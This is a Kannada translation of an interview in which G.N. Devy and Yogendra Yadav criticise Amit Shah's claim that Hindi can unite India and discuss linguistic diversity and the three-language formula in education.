ಭಾರತೀಯರನ್ನು ಒಗ್ಗೂಡಿಸಬಲ್ಲದೇ ಹಿಂದಿ?

ಹಿಂದಿ ಭಾಷೆ ದೇಶ ಒಗ್ಗೂಡಿಸಬಲ್ಲದು ಎಂಬ ಕೇಂದ್ರ ಗೃಹಮಂತ್ರಿ ಅಮಿತ್ ಶಾ ಅವರ ಹೇಳಿಕೆ ದಕ್ಷಿಣದ ರಾಜ್ಯಗಳು ಭುಗಿಲೇಳಲು ಕಾರಣವಾಯ್ತು. ಕೊನೆಗೆ ತಾವು ಹಿಂದಿ ದ್ವಿತೀಯ ಭಾಷೆಯಾಗಲಿ ಎಂದು ಹೇಳಿದ್ದಾಗಿ ಶಾ ಸಮಜಾಯಿಷಿ ನೀಡಿದರು. ಭಾರತದಂತಹ ಭಾಷಾ ವೈವಿಧ್ಯದ ರಾಷ್ಟ್ರದಲ್ಲಿ ಏಕಭಾಷಾ ಸೂತ್ರ ತಂದೊಡ್ಡುವ ಅಪಾಯಗಳನ್ನು ಕುರಿತು ಭಾಷಾತಜ್ಞ ಜಿ.ಎನ್.ದೇವಿ ಮತ್ತು ಸ್ವರಾಜ್ ಇಂಡಿಯಾ ಅಧ್ಯಕ್ಷ ಯೋಗೇಂದ್ರ ಯಾದವ್ ಇಲ್ಲಿ ಬೆಳಕು ಚೆಲ್ಲಿದ್ದಾರೆ. ಅವರ ಸಂಭಾಷಣೆಯನ್ನು ನಿರ್ವಹಿಸಿದವರು ಅನುರಾಧಾ ರಾಮನ್.

ಹಿಂದಿ ಎಲ್ಲರ ಭಾಷೆಯೇ?

ಜಿ.ಎನ್.ದೇವಿ: ‘ಶಾ’ ಎಂಬ ಹೆಸರೇ ಪರ್ಶಿಯನ್ ಮೂಲದ್ದು. ನಮ್ಮ ಎಲ್ಲ ಭಾಷೆಗಳೂ ಒಂದಕ್ಕೊಂದು ಸಂಬಂಧ ಹೊಂದಿರುವಂಥವು. 2011ರ ಗಣತಿಯ/ಸರ್ವೆ ಪ್ರಕಾರ ನಮ್ಮ ದೇಶದಲ್ಲಿ ಸುಮಾರು 1,369 ಮಾತೃಭಾಷೆಗಳಿವೆ; ಇವೆಲ್ಲವುಗಳ ಜೊತೆಗೆ ಹಿಂದಿಯೂ ಒಂದು ಭಾಷೆ ಅಷ್ಟೆ.

ಹಿಂದಿಯನ್ನೇ ಪ್ರಧಾನವಾಗಿ ಮಾತನಾಡುವ ಉತ್ತರ ಪ್ರದೇಶ ಹಾಗೂ ಬಿಹಾರಗಳಲ್ಲಿ ಕೂಡ ಅಲ್ಲಿನ ಬಹಳಷ್ಟು ಜನ ಆಡುವ ಭಾಷೆ ನಾವು ತಿಳಿದಿರುವ ಹಿಂದಿಯಂತಲ್ಲ ಅಲ್ಲವೇ?

ನಾನು ಮತ್ತೆ ಹಿಂದೆ ಉಲ್ಲೇಖಿಸಿದ ಗಣತಿಯ/ಸರ್ವೆ ಮಾಹಿತಿಗೆ ಮರಳುತ್ತೇನೆ. ಎಲ್ಲಾ ಭಾಷೆಗಳು ಮುನ್ನೆಲೆಗೆ ಬರುತ್ತಿದ್ದ ಕಾಲದಲ್ಲಿ ಐದುಕೋಟಿ ಜನ ಆಡುತ್ತಿದ್ದ ಭೋಜಪುರಿ ಭಾಷೆಯನ್ನು ಹಿಂದಿ ನಿಧನಿಧಾನವಾಗಿ ಆಪೋಶನ ತೆಗೆದುಕೊಂಡಿತು. ಗಣತಿಯು/ಸರ್ವೆ ಭೋಜಪುರಿಯನ್ನು ಹಿಂದಿ ಭಾಷೆಯ ಉಪಭಾಷೆಯೆಂಬಂತೆ ದಾಖಲಿಸಿಕೊಂಡಿತು. ಹೌದು ಇಂದು ಹಿಂದಿ ಭಾಷೆ ದೇಶದಾದ್ಯಂತ ಬಳಕೆಯಲ್ಲಿದೆ; ಆದರೆ ಹಾಗಂತ ದೇಶದ ಬಹುಪಾಲು ಜನ ಅದನ್ನು ಬಳಸುತ್ತಿದ್ದಾರೆ ಎಂದು ಅರ್ಥವಲ್ಲ. ಬರೀ ಸಂಖ್ಯಾಬಲಗಳ ಮೇಲೆ ಮಾತನಾಡುವುದು ಎಷ್ಟು ಸರಿ ನನಗೆ ಗೊತ್ತಿಲ್ಲ. ಎಷ್ಟು ಜನ ಹಿಂದಿ ಮಾತಾಡುತ್ತಿದ್ದಾರೆ ಎಂಬುದು ಮುಖ್ಯವಲ್ಲ; ದೇಶವನ್ನು ಒಂದುಗೂಡಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ‘ಶಾ’ ಅವರ ವಾದವನ್ನು ನೀವು ಗಮನಿಸಬೇಕು.

ದೇಶವನ್ನು ಒಂದುಗೂಡಿಸಿರುವುದು 8ನೇ ಪರಿಚ್ಛೇದಲ್ಲಿ ದೇಶದ 22 ಭಾಷೆಗಳಿಗೆ ಸ್ಥಾನ ಕೊಟ್ಟಿರುವ ಸಂವಿಧಾನವೇ ಹೊರತು ‘ಶಾ’ ಹೇಳಿದಂತೆ ಹಿಂದಿ ಭಾಷೆಯಲ್ಲ. ಸಂವಿಧಾನವು ಸದಾ ಭಾಷಾವೈವಿಧ್ಯವನ್ನು ಎತ್ತಿಹಿಡಿಯುತ್ತದೆ. ಹೀಗಿರುವಾಗ ಮಾನ್ಯ ‘ಶಾ’ ಅವರು ಅದು ಹೇಗೆ 22 ಭಾಷೆಗಳಲ್ಲಿನ ಯಕಃಶ್ಚಿತ್ ಒಂದು ಭಾಷೆ ಇಡೀ ದೇಶವನ್ನು ಒಗ್ಗೂಡಿಸಬಲ್ಲದು ಎಂದು ಹೇಳುತ್ತಾರೆ? ಭಾರತೀಯರನ್ನು ನಿಜವಾಗಿಯೂ ಒಂದುಗೂಡಿಸಿರುವುದು ನಮ್ಮ ಸಂವಿಧಾನ, ನಮ್ಮ ಇತಿಹಾಸ, ಸ್ವಾತಂತ್ರ್ಯ ಚಳವಳಿ, ಬುದ್ಧ, ಬಸವ, ಮೊದಲಾದ ಭಕ್ತಿಚಳವಳಿಗಳು. ಹಾಗಾಗಿ ಮಾನ್ಯ ‘ಶಾ’ ಅವರ ಹೇಳಿಕೆಯು ಐತಿಹಾಸಿಕವಾಗಿಯೂ ಹಾಗೂ ಸಂವಿಧಾನಾತ್ಮಕವಾಗಿಯೂ ಅಪಕ್ವತೆಯಿಂದ ಕೂಡಿದ್ದಾಗಿದೆ; ಭಾಷಾಶಾಸ್ತ್ರದ ದೃಷ್ಟಿಯಿಂದ ನೋಡಿದರೂ ಅಸಮರ್ಥವಾಗಿದೆ.

ಒಂದು ಭಾಷೆ ತನ್ನ ಲಾಕ್ಷಣಿ ವೃತ್ತಿಗಳ ಸಾಮಥ್ರ್ಯವನ್ನು ವಿಸ್ತರಿಸುವ ಸಂದರ್ಭದಲ್ಲಿ ಅದು ತನ್ನಲ್ಲೇ ವಿಘಟನೆಗೊಳ್ಳತೊಡಗುತ್ತದೆ. ಹಿಂದೆ ಲ್ಯಾಟಿನ್ ಭಾಷೆಯಲ್ಲೂ ಇದೇ ಆಗಿದೆ;  ಸಂಸ್ಕೃತದಲ್ಲೂ ಇದೇ ಆಗಿದೆ. ಮತ್ತೀಗ ಈ ಪ್ರಕ್ರಿಯೆ ಇಂಗ್ಲಿಷ್ ಭಾಷೆಯಲ್ಲೂ ಆಗುತ್ತಿದೆ. ಹಾಗಾಗಿ ಮಾನ್ಯ ‘ಶಾ’ ಅವರು ಹಿಂದಿ ಭಾಷೆಯನ್ನು ಸಂರಕ್ಷಿಸಬೇಕೆಂದರೆ ಅದನ್ನು ತನ್ನ ಪಾಡಿಗೆ ಬಿಟ್ಟುಬಿಡಬೇಕು. ಸರ್ಕಾರ ಜನಸಾಮಾನ್ಯರು ಆಡುವ ಭಾಷೆಯೊಂದಿಗೆ ಯಾವತ್ತೂ ಮೂಗುತೂರಿಸಬಾರದು.

ಯೋಗೇಂದ್ರ ಯಾದವ್: ನಾನು ಪ್ರೊ.ದೇವಿಯವರು ನಿಲ್ಲಿಸಿದಲ್ಲಿಂದ ಮುಂದುವರೆಸುತ್ತೇನೆ: ಮಾನ್ಯ ‘ಶಾ’ ಅವರಿಗೆ ಖಂಡಿತವಾಗಿ ಗೊತ್ತಿದೆ, ಹಿಂದಿ ನಮ್ಮೆಲ್ಲರ ಭಾಷೆ ಅಲ್ಲ ಅಂತ. ಅವರ ಅಧಿಕೃತ ಪತ್ರಿಕಾ ಹೇಳಿಕೆಗಳಲ್ಲಿ ಹಾಗೂ ಭಾಷಣಗಳಲ್ಲಿ ಅವರು ಭಾರತದ ಬಹುಭಾಷಾ ತತ್ವದ ಬಗ್ಗೆಯೂ ಮಾತನಾಡುತ್ತಾರೆ; ಹಾಗೆಯೇ ಜನರು ಹೆಚ್ಚು ಹೆಚ್ಚು ಹಿಂದಿಯನ್ನು ಬಳಸಲೂ ಉತ್ತೇಜನ ನೀಡುತ್ತಾರೆ. ನಿಜ ಹೇಳಬೇಕೆಂದರೆ ಇದು ಹಿಂದಿ ಭಾಷೆಯವನಲ್ಲದ ವ್ಯಕ್ತಿಯ ಬಾಯಿಂದ ಬಂದ ನಿರುಪದ್ರವಿ ಹೇಳಿಕೆಯಂತೆ ಕಾಣುತ್ತದೆ.

ಆದರೆ ಅವರ ಸಮಸ್ಯೆ ಎಂದರೆ ದೇಶದ ಬಹುತ್ವದ ಪರವಾಗಿ ನಿಲ್ಲದೆ, ದೇಶವನ್ನು ಒಗ್ಗೂಡಿಸಬಲ್ಲ ಒಂದು ಭಾಷೆ ನಮಗೆ ಬೇಕು, ಮತ್ತದು ಹಿಂದಿಯೇ ಆಗಿರಬೇಕು ಎಂಬುದು. ಇದು ನನಗೆ 19ನೇ ಶತಮಾನದಲ್ಲಿ ಏಕತೆಯನ್ನು ಮೂಡಿಸುವಲ್ಲಿ ಭಾರೀ ಸೋಲನ್ನು ಕಂಡ ಯೂರೋಪಿಯನ್ ಮಂತ್ರ: ‘ಒಂದು ರಾಷ್ಟ್ರ; ಒಂದು ಭಾಷೆ; ಒಂದು ಸಂಸ್ಕೃತಿ’ ಯ ಅನುಕರಣೆಯಂತೆಯೇ ಕಾಣುತ್ತಿದೆ. ದುರಂತ ಎಂದರೆ ಆ ಮಂತ್ರ ಆಗ ಇಡೀ ಪ್ರಪಂಚದಾದ್ಯಂತ ರಕ್ತದ ಹೊಳೆಯನ್ನೇ ಹರಿಸಿದ್ದನ್ನು ನಾವು ನೋಡಿದ್ದೇವೆ. ಇಡೀ ಜಗತ್ತೇ ಈ ಹಳಸಲು ಮಂತ್ರದಿಂದ ಸಾಗಿ ಬಹಳ ಮುಂದೆ ಹೋಗಿರುವಾಗ ನಮ್ಮ ನಾಯಕರು ಅದನ್ನು ಅನುಸರಿಸಲು ಮುಂದಾಗಿದ್ದಾರೆ! ಇದು ವಸಾಹತುಶಾಹಿ ಮನಸ್ಸಿನ ನಿಜವಾದ ಶಾಪ. ನಾವು ವಸಾಹತುಶಾಹಿಗೆ ಒಳಗಾಗಿದ್ದೆವು ಎಂಬುದು ದುರಂತವಲ್ಲ; ಬದಲಿಗೆ ಒಂದು ಭಾಷೆಯಿಂದಾಚೆ ಯೋಚಿಸಲಾರದ ಭಾಷಿಕ ಕೂಪಮಂಡೂಕಗಳಾಗಿರುವುದು ದೊಡ್ಡ ದುರಂತ ಎನಿಸುತ್ತದೆ. ಈ ಮಂತ್ರದ ಶೃತಿಯು ನಮ್ಮ ಇತಿಹಾಸ,  ಸಂಸ್ಕೃತಿ  ಹಾಗೂ ನಾಗರಿಕತೆ ಯಾವುದರಲ್ಲೂ ಇಲ್ಲ. ಒಂದಕ್ಕಿಂತ ಹೆಚ್ಚು ಭಾಷೆಗಳನ್ನು ಸುಲಲಿತವಾಗಿ ಬಳಸಬಲ್ಲ ಬಹುಭಾಷಾ  ಸಂಸ್ಕೃತಿಯ ಸಮಾಜ ನಮ್ಮದು.

ಹೌದು ಎಲ್ಲಾ ನಾಯಕರೂ ರಾಷ್ಟ್ರೀಯ ಚಳವಳಿಯ ಸಂದರ್ಭದಲ್ಲಿ ಹಿಂದಿಯನ್ನು ವಿಶೇಷವಾಗಿ ಪರಿಗಣಿಸಿದ್ದಾರೆ. ಅವರೆಲ್ಲರೂ ಹಿಂದೂಸ್ತಾನಿ ಎಂಬ ಕಲಬೆರಕೆಯ ಭಾಷೆಯನ್ನು ಬೆಂಬಲಿದ್ದಾರೆಯೇ ಹೊರತು ನಾವೀಗ ಹೇಳುತ್ತಿರುವ ಶುದ್ಧ ಹಿಂದಿಯನ್ನಲ್ಲ. ಆದರೆ ಅವರೆಲ್ಲರಿಗೂ ನಿಚ್ಚಳವಾಗಿ ತಿಳಿದಿತ್ತು, ಯಾವ ಭಾಷೆಯನ್ನೂ ನಾವು ಜನರ ಮೇಲೆ ಹೇರಬಾರದು ಎಂದು.

ಜಿ.ಎನ್.ದೇವಿ: ನಾವು 1955-56ರಲ್ಲಿ ಭಾಷಾವಾರು ರಾಜ್ಯಗಳ ವಿಂಗಡಣೆ ಮಾಡಿದೆವು. ಇಂದು ಸುಮಾರು 35% ಅಷ್ಟು ಜನರು ಪ್ರತಿದಿನ ಕೆಲಸಕ್ಕೋಸ್ಕರ ವಲಸೆ ಹೋಗುತ್ತಿದ್ದಾರೆ. ಇಂಥ ಸಂದರ್ಭದಲ್ಲಿ ನಾವು ನಮ್ಮ ನಮ್ಮ ರಾಜ್ಯಗಳಲ್ಲಿ ಹೊಸ ರೂಪದ ಭಾಷಾ ಅಸ್ಮಿತೆಯ ಪರಿಕಲ್ಪನೆಯನ್ನು ಕಂಡುಕೊಳ್ಳಬೇಕಿದೆ. ನಮ್ಮ ನಗರಗಳು ಬಹುಭಾಷಾ ತಾಣಗಳಾಗಿ ಗುರುತಿಸಲ್ಪಡಬೇಕಿದೆ. ಇದು ನಮ್ಮ ಶಿಕ್ಷಣ ನೀತಿಗಳು ಯಾವುದೋ ಮಹಾನಗರದ ಕಪಿಮುಷ್ಟಿಯಲ್ಲಿ ಸಿಲುಕುವುದರಿಂದ ನಮ್ಮನ್ನು ಬಚಾವುಮಾಡಲು ಸಹಾಯವಾಗುತ್ತದೆ. ಇಂದು ಮಹಾನಗರಗಳಲ್ಲಿ ಬಹುಭಾಷಾತಾಣಗಳನ್ನು ಏಕಭಾಷಾ ಆವಾಸಗಳನ್ನಾಗಿ ಮಾರ್ಪಡಿಸುತ್ತಿರುವುದು ಸರಿಯಲ್ಲ.

ಏಕತೆಯ ಕುರಿತಾಗಿ ಯಾವುದೇ ಪ್ರಭುತ್ವವೊಂದು ಮುನ್ನೆಲೆಗೆ ತರುವ ಯಾಂತ್ರಿಕ ಹಾಗೂ ಏಕೀಕೃತ ವಿಚಾರಗಳು ಕ್ರಮೇಣ ರಾಜ್ಯ ರಾಜ್ಯಗಳ ಗಡಿಗಳ ನಡುವೆ ವೈರತ್ವವನ್ನು ಸೃಷ್ಟಿಮಾಡತೊಡಗುತ್ತವೆ. ಭಾರತವು ಇಂಥ ರಾಷ್ಟ್ರೀಯತೆಯ ಅಂಧತ್ವದಲ್ಲಿ ಮುಂದುವರೆದಿದ್ದೇ ಆದರೆ ತನ್ನ ನೆರೆಹೊರೆಯ ದೇಶಗಳೊಂದಿಗೆ ಸಹಬಾಳ್ವೆಯ ಸಂಬಂಧವನ್ನು ಹೊಂದಲು ಖಂಡಿತಾ ಸಾಧ್ಯವಿಲ್ಲ.

ಉದಾಹರಣೆಗೆ ಒಂದು ಮಗು ಮಹಾರಾಷ್ಟ್ರದಲ್ಲಿ ಮರಾಠಿಯಲ್ಲೇ ವಿದ್ಯಾಭ್ಯಾಸ ನೀಡಬೇಕು ಎಂದು ವಾದಿಸಬಹುದು ಮತ್ತಿದು ಭಾಷಾವಾರು ರಾಜ್ಯದ ದೃಷ್ಟಿಯಿಂದ ಉಚಿತವೇ. ಆದರೆ ಮುಂಬಯಿ ಆದ್ಯಂತ ಇದನ್ನು ಬಲವಂತವಾಗಿ ಹೇರುವುದು ಸರಿಯಲ್ಲ. ಹಾಗಾಗಿ ರಾಜ್ಯವೊಂದರ ಪ್ರಜೆಗಳ ಭಾಷಾಸ್ವಾತಂತ್ರ್ಯವನ್ನು ಹಾಗೂ ಅವರ ಆಯ್ಕೆಗಳನ್ನು ರಾಜ್ಯಸರ್ಕಾರವು ವಿಶಾಲ ಮನೋಭಾವದಿಂದ ಪರಿಗಣಿಸಬೇಕೆ ಹೊರತು ಸಂಕುಚಿತಗೊಳ್ಳಬಾರದು. ಏಕತೆಯ ಕುರಿತಾಗಿ ಯಾವುದೇ ಪ್ರಭುತ್ವವೊಂದು ಮುನ್ನೆಲೆಗೆ ತರುವ ಯಾಂತ್ರಿಕ ಹಾಗೂ ಏಕೀಕೃತ ವಿಚಾರಗಳು ಕ್ರಮೇಣ ರಾಜ್ಯ ರಾಜ್ಯಗಳ ಗಡಿಗಳ ನಡುವೆ ವೈರತ್ವವನ್ನು ಸೃಷ್ಟಿಮಾಡತೊಡಗುತ್ತವೆ. ಭಾರತವು ಇಂಥ ರಾಷ್ಟ್ರೀಯತೆಯ ಅಂಧತ್ವದಲ್ಲಿ ಮುಂದುವರೆದಿದ್ದೇ ಆದರೆ ತನ್ನ ನೆರೆಹೊರೆಯ ದೇಶಗಳೊಂದಿಗೆ ಸಹಬಾಳ್ವೆಯ ಸಂಬಂಧವನ್ನು ಹೊಂದಲು ಖಂಡಿತಾ ಸಾಧ್ಯವಿಲ್ಲ.

ಗಣರಾಜ್ಯವೊಂದರಲ್ಲಿ ವೈವಿಧ್ಯಕ್ಕೆ ಅಗ್ರಮಾನ್ಯತೆ ಇರಬೇಕು. ವೈವಿಧ್ಯದಲ್ಲಿ ಏಕತೆಯ ರಾಷ್ಟ್ರ ಭಾರತ. ವೈವಿಧ್ಯ ಎಂಬುದು ಒಂದು ದೊಡ್ಡ ತತ್ವವಾಗಿರಬೇಕೇ ಹೊರತು ಸಾಂಸ್ಕೃತಿಕ ಹೊರೆಯಾಗಬಾರದು. ಯಾವುದೇ ‘ಒಂದು’ ಭಾಷಾ ಕೇಂದ್ರಿತ ಆಲೋಚನೆ- ಅದು ಹಿಂದಿಯಾಗಿರಲಿ ಅಥವಾ ಇಂಗ್ಲಿಷ್ ಆಗಿರಲಿ ಯಾವತ್ತಿದ್ದರೂ ಆರ್ಥಿಕವಾಗಿ ಭಾರತದಂಥ ದೇಶಕ್ಕೆ ಮಾರಕವಾದದ್ದು. ಇಂಥ ಭಾವನಾತ್ಮಕವಾದ ವಿಷಯಗಳನ್ನು ಜನರೆಡೆಗೆ ತೂರಿಬಿಡುತ್ತ ದೇಶವು ಪ್ರಸ್ತುತ ಎದುರಿಸುತ್ತಿರುವ ಆರ್ಥಿಕ ಕುಸಿತವನ್ನು ಮರೆಮಾಚುವುದು ಇದರ ಹಿಂದಿನ ಉದ್ದೇಶವಾಗಿರಲಿಕ್ಕೆ ಸಾಕು ಎಂದು ಹೇಳಿದರೆ ತಪ್ಪಲ್ಲ.

ತ್ರಿಭಾಷಾ ಸೂತ್ರದ ಬಗ್ಗೆ ಆಲೋಚಿಸಲು ಇದು ಸಕಾಲ ಎಂದು ಎನಿಸುತ್ತದೆಯೇ?

ಯೋಗೇಂದ್ರ ಯಾದವ್: ಶೈಕ್ಷಣಿಕವಾಗಿ ನೋಡಿದರೆ ಇದು ಒಳ್ಳೆಯದು ಎಂಬುದರಲ್ಲಿ ಎರಡು ಮಾತಿಲ್ಲ. ಶಾಲೆಯಲ್ಲಿ ಮಗುವೊಂದು ಪ್ರಾಥಮಿಕ ಭಾಷೆಯಾಗಿ ತನ್ನ ಮಾತೃಭಾಷೆಯನ್ನೋ ಅಥವಾ ತನ್ನ ಮನೆಮಾತನ್ನೋ ಕಲಿಯಬೇಕು; ಉದಾಹರಣೆಗೆ ಮಗುವಿನ ಮನೆಮಾತು ಕೊಂಕಣಿಯೋ ಅಥವಾ ಬೋಜಪುರಿಯೋ ಆಗಿದ್ದರೆ ಪ್ರಾಥಮಿಕ ಶಾಲಾ ಹಂತದಲ್ಲಿ ಈ ಭಾಷೆಯನ್ನು ಮಗುವಿನ ಕಲಿಕೆಯ ಮಾಧ್ಯಮವಾಗಿ ಕಲಿಸಬೇಕು. ಅಲ್ಲಿಂದ ಕ್ರಮೇಣವಾಗಿ ಮಗು ಆಯಾ ರಾಜ್ಯದ ಅಧಿಕೃತ ಭಾಷೆಯ ಕಲಿಕೆಗೆ ಹೊರಳಬೇಕು. ಅದು ಮರಾಠಿಯೋ ಕನ್ನಡವೋ ಏನೂ ಆಗಿರಬಹುದು.

ಇಂಗ್ಲಿಷ್ ಭಾಷೆಯನ್ನು ಒಂದು ಭಾಷೆಯಾಗಿ ಮೂಲದಿಂದಲೇ ಕಲಿಸಬೇಕೇ ಹೊರತು ಅದನ್ನೇ ಪ್ರಾಥಮಿಕ ಕಲಿಕೆಯ ಭಾಷೆಯನ್ನಾಗಿ ಅಲ್ಲ. ಅಗತ್ಯ ಇರುವವರು ಉನ್ನತ ಮಟ್ಟದ ತಾಂತ್ರಿಕ ವಿದ್ಯಭ್ಯಾಸದ ದೃಷ್ಟಿಯಿಂದ ಇನ್ನೂ ಹೆಚ್ಚಿನ ಹಾಗೂ ಆಳವಾದ ಇಂಗ್ಲಿಷ್ ಭಾಷಾ ಶಿಕ್ಷಣವನ್ನು ಪಡೆದುಕೊಳ್ಳಬಹುದೆ ಹೊರತು ಸಾಮೂಹಿಕವಾಗಿ ಎಲ್ಲರ ಮೇಲೂ ಅನಗತ್ಯವಾಗಿ ಇಂಗ್ಲಿಷನ್ನು ಹೇರಬಾರದು. ಹಿಂದಿಯನ್ನು ಪ್ರಾಥಮಿಕ ಹಂತದಿಂದಲೇ ಹಿಂದಿಯೇತರ ರಾಜ್ಯಗಳಲ್ಲಿ ಪರಿಚಯಿಸಬೇಕು; ಹಾಗೆಯೇ ಹಿಂದಿ ಮಾತನಾಡುವ ರಾಜ್ಯಗಳಲ್ಲಿ ಹಿಂದಿಯೇತರ ಭಾಷೆಯನ್ನು ಪರಿಚಯಿಸಬೇಕು. ಇದು ತ್ರಿಭಾಷಾ ಸೂತ್ರ. ನಮ್ಮಂಥ ದೇಶದಲ್ಲಿ ಸಲ್ಲಬಲ್ಲಂಥದ್ದು ಎಂದು ಎಲ್ಲಾ ರಾಜ್ಯಗಳ ಮುಖ್ಯಮಂತ್ರಿಗಳೂ ಹಾಗೂ ಕೊತಾರಿ ಕಮಿಷನ್‍ನ ಶಿಕ್ಷಣತಜ್ಞರೂ ಒಮ್ಮತದಿಂದ ಒಪ್ಪಿಕೊಂಡಿರುವ ಸೂತ್ರವಿದು.

ಹಿಂದಿ ಭಾಷೆಗಿಂತ ಹಿಂದಿನ ಹಾಗೂ ಸಂಪದ್ಭರಿತವಾದ ತಮಿಳು, ಕನ್ನಡ, ತೆಲುಗು ಮೊದಲಾದ ಭಾಷೆಗಳನ್ನು ಒಳಗೊಳ್ಳುವ ಬದಲು ಅವರು ಮೂರನೇ ಭಾಷೆಯಾಗಿ ರಾಷ್ಟ್ರೀಯತೆಯನ್ನು ಬಿತ್ತುವ ಮಾರ್ಗವಾಗಿ ಸಂಸ್ಕೃತವನ್ನು ಬಳಸುತ್ತಿದ್ದಾರೆ; ಮತ್ತಿದು ಈಗ ಹಿಂದಿ ಹೇರಿಕೆಯ ರೂಪ ಪಡೆದುಕೊಂಡಿದೆ.

ಆದರೆ ದುರಂತವೆಂದರೆ ಈ ಸೂತ್ರವನ್ನು ಎರಡೂ ದಿಕ್ಕಿನಿಂದ ಧ್ವಂಸಮಾಡಲಾಗಿದೆ. ಬಹುತೇಕ ಹಿಂದಿಯೇತರ ಭಾಷಾ ರಾಜ್ಯಗಳು ಹಿಂದಿಯನ್ನು ಒಳಗೊಂಡಿದ್ದರೂ ಹಿಂದಿ ಭಾಷಾ ರಾಜ್ಯಗಳು ಮಾತ್ರ ಹಿಂದಿಯೇತರ ಭಾಷೆಯನ್ನು ತಮ್ಮ ಶಿಕ್ಷಣದಲ್ಲಿ ಒಳಗೊಳ್ಳುವುದರಿಂದ ನುಣುಚಿಕೊಂಡಿವೆ (ಅದರಲ್ಲೂ ದಕ್ಷಿಣ ಭಾರತದ ಭಾಷೆಗಳ ಕುರಿತು). ಹಿಂದಿ ಭಾಷೆಗಿಂತ ಹಿಂದಿನ ಹಾಗೂ ಸಂಪದ್ಭರಿತವಾದ ತಮಿಳು, ಕನ್ನಡ, ತೆಲುಗು ಮೊದಲಾದ ಭಾಷೆಗಳನ್ನು ಒಳಗೊಳ್ಳುವ ಬದಲು ಅವರು ಮೂರನೇ ಭಾಷೆಯಾಗಿ ರಾಷ್ಟ್ರೀಯತೆಯನ್ನು ಬಿತ್ತುವ ಮಾರ್ಗವಾಗಿ ಸಂಸ್ಕೃತವನ್ನು ಬಳಸುತ್ತಿದ್ದಾರೆ; ಮತ್ತಿದು ಈಗ ಹಿಂದಿ ಹೇರಿಕೆಯ ರೂಪ ಪಡೆದುಕೊಂಡಿದೆ.

ಇನ್ನು ನಮ್ಮ ಸುಶಿಕ್ಷಿತ ವರ್ಗವು ತಮ್ಮ ಜ್ಞಾನಾರ್ಜನೆಗೆ ಹಾಗೂ ಶೈಕ್ಷಣಿಕತೆ ಇಂಗ್ಲಿಷ್ ಭಾಷೆಯನ್ನು ಬಹಳ ಸಲೀಸಾಗಿ ಸ್ವೀಕರಿಸಿಬಿಟ್ಟಿದ್ದಾರೆ. ತ್ರಿಭಾಷಾ ಸೂತ್ರವು ಬರೀ ಕಾಗದದ ಮೇಲಿನ ಸೂತ್ರವಾಗಿದೆ. ‘ಶಾ’ ಅವರ ಹಿಂದಿ ಹೇರಿಕೆಯ ಹೇಳಿಕೆಯಿಂದ ಈ ವಾಗ್ವಾದ ಶುರುವಾಗಿದ್ದರೂ ವಾಸ್ತವವಾಗಿ ನಾವೆಲ್ಲರೂ ಇಂಗ್ಲಿಷ್ ಹೇರಿಕೆಯ ಸಾಮೂಹಿಕ ಸನ್ನಿಗೆ ಒಳಗಾಗಿರುವುದು ಕಟುಸತ್ಯ. ದೊಡ್ಡ ದೊಡ್ಡ ಬಸ್ಸುಗಳಲ್ಲಿ ಇಂಗ್ಲಿಷ್ ಶಾಲೆಗಳಿಗೆ ತೆರಳುವ ಮಕ್ಕಳನ್ನು ನಿಂತು ನೋಡುವ ಗ್ರಾಮೀಣ ಪ್ರದೇಶದ ಮಕ್ಕಳನ್ನು ನೆನೆಸಿಕೊಂಡರೆ ಖೇದವಾಗುತ್ತದೆ. ಇದು ನಮ್ಮ ಶಿಕ್ಷಣ ಪದ್ಧತಿಯ ಕ್ರೌರ್ಯ/ದುರಂತ.

ಮಾನ್ಯ ದೇವಿಯವರೇ, ಮಗು ಒಂದು ಭಾಷೆಯನ್ನು ಹೇಗೆ ಕಲಿಯುತ್ತದೆ ಎಂದು ನೀವು ಬರೆದಿದ್ದೀರಿ; ಒಟ್ಟಿಗೆ ಹಲವು ಭಾಷೆಗಳನ್ನು ಕಲಿಯಲೂ ಅದಕ್ಕೆ ಸಾಧ್ಯವೇ?

ಜಿ.ಎನ್.ದೇವಿ: ಡಾ.ಯಾದವ್ ಅವರ ಮಾತುಗಳನ್ನು ಒಪ್ಪುತ್ತೇನೆ. ಒಂದು ಮಗು ಒಂದು ಭಾಷೆಯನ್ನು ಕಲಿಯಲು ತೊಡಗಿದರೆ ಒಂದು ಹೊಸ ಲೋಕವೇ ತೆರೆದುಕೊಳ್ಳತೊಡಗುತ್ತದೆ. ಪ್ರತಿಯೊಂದು ಭಾಷೆಗೂ ಅದರದೇ ಆದ ಲೋಕ ಜ್ಞಾನವಿದೆ. ಆದರೆ ಶೈಶವಾವಸ್ಥೆಯಲ್ಲಿ ಹಲವು ಭಾಷೆಗಳಿಂದ ಗೊಂದಲಗೊಳ್ಳುವ ಮಗುವಿನ ಅರಿವು ಸ್ವಾಭಾವಿಕವಾಗಿ ವಿಕಾಸಗೊಳ್ಳದೇ ಹೋಗುತ್ತದೆ. ಶಾಲಾಪೂರ್ವ ವರ್ಷಗಳಲ್ಲಿ ಇಂಥ ಸ್ಥಿತಿಯನ್ನು ಅನುಭವಿಸುವುದು ಮಗುವಿನ ಆರೋಗ್ಯದ ದೃಷ್ಟಿಯಿಂದ ಒಳ್ಳೆಯದಲ್ಲ. ಆದರೆ ಮಗು ಲೋಕಕ್ಕೆ ಬಹಳ ಬೇಗ ಹೊಂದಿಕೊಳ್ಳುತ್ತದೆ; ಮಾಧ್ಯಮಿಕ ಶಾಲಾ ಹಂತದಲ್ಲಿ ಕಲಿಯುವ ಹೊಸ ಭಾಷೆಗಳು ಅವರಲ್ಲಿ ಹೊಸ ಲೋಕವನ್ನೇ ತೆರೆಯುತ್ತವೆ. ಎಲ್ಲರೂ ತಮ್ಮ ಸ್ವಭಾಷಾ ವಲಯದ ಭಾಷೆಗಿಂತ ಹೊರವಲಯದ ದೇಶಭಾಷೆಯ ಕುರಿತೇ ಆಸಕ್ತರಾಗಿರುವ ಈ ಕಾಲಘಟ್ಟದಲ್ಲಿ ಲೋಕಭಾಷೆಯನ್ನು ಕಲಿಯದೆ ಗತ್ಯಂತರವಿಲ್ಲ. ತ್ರಿಭಾಷಾ ಸೂತ್ರ ನಿಜವಾಗಿಯೂ ಒಳ್ಳೆಯದು. ಆದರೆ ಮಗುವಿನ ಭಾಷೆಗಳನ್ನು ಆಯಾ ಮಗುವಿನ ಪೋಷಕರೇ ನಿರ್ಣಸಬೇಕೆ ಹೊರತು ಸರ್ಕಾರವಲ್ಲ.

